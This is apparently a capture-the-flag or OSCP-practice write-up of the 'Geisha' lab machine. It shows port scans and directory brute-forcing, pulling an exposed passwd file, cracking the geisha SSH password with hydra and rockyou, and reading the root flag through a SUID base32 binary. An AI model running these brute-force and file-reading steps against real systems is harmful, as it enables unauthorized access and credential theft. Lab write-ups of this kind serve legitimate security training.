Pwned Date - 13th June 2022

Enumeration

┌──(kali㉿VirtualBox)-[~]
└─$ rustscan -a 192.168.181.82

PORT     STATE SERVICE       REASON
21/tcp   open  ftp           syn-ack
22/tcp   open  ssh           syn-ack
80/tcp   open  http          syn-ack
3389/tcp open  ms-wbt-server syn-ack
7080/tcp open  empowerid     syn-ack
7125/tcp open  unknown       syn-ack
8088/tcp open  radan-http    syn-ack
9198/tcp open  unknown       syn-ack

┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.181.82  -p 21,22,80,3389,7080,7125,8088,9198

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
|   256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_  256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp   open  http          Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Geisha
3389/tcp open  http          nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Seppuku
7080/tcp open  ssl/empowerid LiteSpeed
|_http-server-header: LiteSpeed
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-09T14:01:34
|_Not valid after:  2022-05-09T14:01:34
|_http-title: Did not follow redirect to <https://192.168.181.82:7080/>
7125/tcp open  http          nginx 1.17.10
|_http-server-header: nginx/1.17.10
|_http-title: Geisha
8088/tcp open  http          LiteSpeed httpd
|_http-title: Geisha
|_http-server-header: LiteSpeed
9198/tcp open  http          SimpleHTTPServer 0.6 (Python 2.7.16)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.16
|_http-title: Geisha
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.181.82:80> -w /usr/share/wordlists/dirb/common.txt -q -t 100 
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 176]
/info.php             (Status: 200) [Size: 2]  
/server-status        (Status: 403) [Size: 279]

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.181.82:3389> -w /usr/share/wordlists/dirb/common.txt -q -t 100
/index.html           (Status: 200) [Size: 176]

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.181.82:7125> -w /usr/share/wordlists/dirb/common.txt -q -t 100   
/index.php            (Status: 200) [Size: 175]
/passwd               (Status: 200) [Size: 1432]
/shadow               (Status: 403) [Size: 154]

┌──(kali㉿VirtualBox)-[~]
└─$ curl <http://192.168.181.82:7125/passwd>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.181.82:8088> -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htaccess            (Status: 403) [Size: 1227]
/blocked              (Status: 301) [Size: 1260] [--> <http://192.168.181.82:8088/blocked/>]
/cgi-bin              (Status: 301) [Size: 1260] [--> <http://192.168.181.82:8088/cgi-bin/>]
/docs                 (Status: 301) [Size: 1260] [--> <http://192.168.181.82:8088/docs/>]   
/index.html           (Status: 200) [Size: 176]                                           
/info.php             (Status: 200) [Size: 2]

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.181.82:9198> -w /usr/share/wordlists/dirb/common.txt -q -t 100
/index.html           (Status: 200) [Size: 176]
/info.php             (Status: 200) [Size: 2]

Exploitation

After searching a while and ending up no luck, try to brute force and got this lucky password:

┌──(kali㉿VirtualBox)-[~]
└─$ hydra -l geisha -P /usr/share/wordlists/rockyou.txt 192.168.181.82 -t 64 ssh 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2022-06-13 09:26:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.181.82:22/
[STATUS] 339.00 tries/min, 339 tries in 00:01h, 14344087 to do in 705:13h, 37 active
**[22][ssh] host: 192.168.181.82   login: geisha   password: letmein**
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 28 final worker threads did not complete until end.
[ERROR] 28 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2022-06-13 09:27:58

┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected]
[email protected]'s password: 
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

geisha@geisha:~$ cat local.txt 
fa0a54e4beb661d18b4e45f2d977d852

Privilege Escalation

geisha@geisha:~$ sudo -l
[sudo] password for geisha: 
Sorry, user geisha may not run sudo on geisha.

geisha@geisha:~$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/base32
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount

We will target /usr/bin/base32 at this time https://gtfobins.github.io/gtfobins/base32/#suid

geisha@geisha:~$ LFILE=/root/proof.txt

geisha@geisha:~$ base32 "$LFILE" | base32 --decode
9ed3abaa3a141de31429b0f3cdbc5c21

But hey, we can’t do this in OSCP! We need to get the actual root shell!